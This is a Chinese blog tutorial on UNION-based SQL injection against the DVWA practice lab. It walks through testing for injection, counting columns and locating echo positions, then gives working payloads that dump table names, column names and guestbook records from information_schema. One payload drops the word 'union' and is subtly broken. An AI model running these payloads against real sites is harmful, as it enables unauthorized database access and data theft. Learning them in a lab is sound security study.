union联合查询测试真实网站的步骤

文章介绍了如何利用SQL注入技术对DVWA靶场的Mysql数据库进行低级别测试,包括测试网站是否存在漏洞、获取表名、列名以及数据。详细解释了如何构造UNION查询来达到这些目的。
摘要由CSDN通过智能技术生成

1.输入1‘或1 and 1=1或1' and '1'=2来测试网站是否存在sql注入漏洞

2.使用语句order by判断有多少列数,如’1‘ order by 2#

3.使用union select 1,2(例)来进一步获取回显位置(这里最好将union左边查询的为-1会较大值,这样,才会把显示第一位让出来)

4.在回显位输入想要查询的内容,如select database()或select version()

到这里,真实网站的测试步骤就已经完结了,因为本人是挖src的,所以步骤才会这样结束。如上内容为DVWA靶场sql注入的low级别的测试,数据库为Mysql

如下为进一步获取表,列,数据的步骤:

获取表名:

-1' union select 1,table_name from information_schema.tables where table_schema='dvwa'%23

每一部分的作用:

  1. ': 单引号用于表示一个字符串的开始和结束。

  2. union: 用于合并两个或多个 SELECT 语句的结果集。

  3. select 1: 在 UNION 语句中,表示选择一个常数值 1,用于与第二个 SELECT 语句中的结果集进行合并。

  4. table_name: 表示要查询的字段,这里是 information_schema.table 表中的 table_name 字段,用于获取表名。

  5. from information_schema.tables: 指定要查询的表为 information_schema.tables,该表存储了数据库中所有表的信息。

  6. where table_schema='dvwa': 设定查询条件,筛选出 table_schema 为 ‘dvwa’ 的表,即数据库中属于 ‘dvwa’ 数据库的表名。

 可简单总结为       查询所在列      查询所在表     查询所在行

查询表中字段名:-1’ select 1,column_name from information_schema.columns where table_name ='guestbook' and table_schema ='dvwa'%23

每一部分的作用:

  1. -1’: 在一些 SQL 数据库中,如果该语句考虑到输入时的负数值,则可能会产生问题,因此添加一个负号可以规避这些问题。-1'表示添加负号,后接单引号表示字符串的结束。

  2. select: 指定查询操作。

  3. 1: 表示选择常数值 1,用于与后续 SELECT 语句的结果进行合并。

  4. column_name: 表示要查询的字段,这里是 information_schema.columns 表中的 column_name 字段,用于获取 guestbook 表的所有列名。

  5. from information_schema.columns: 指定查询的表为 information_schema.columns,该表用于存储数据库中所有表的列信息。

  6. where: 指定查询条件。

  7. table_name='guestbook': 指定表名为 guestbook 的表。

  8. and: 用于连接多个查询条件。

  9. table_schema='dvwa': 指定表的 schema 名称为 dvwa,即限制查询的表位于 dvwa 数据库中。

获取表中记录:-1' union select 1,comment from guestbook%23

到此完结,感谢观看。

  • 12
    点赞
  • 11
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值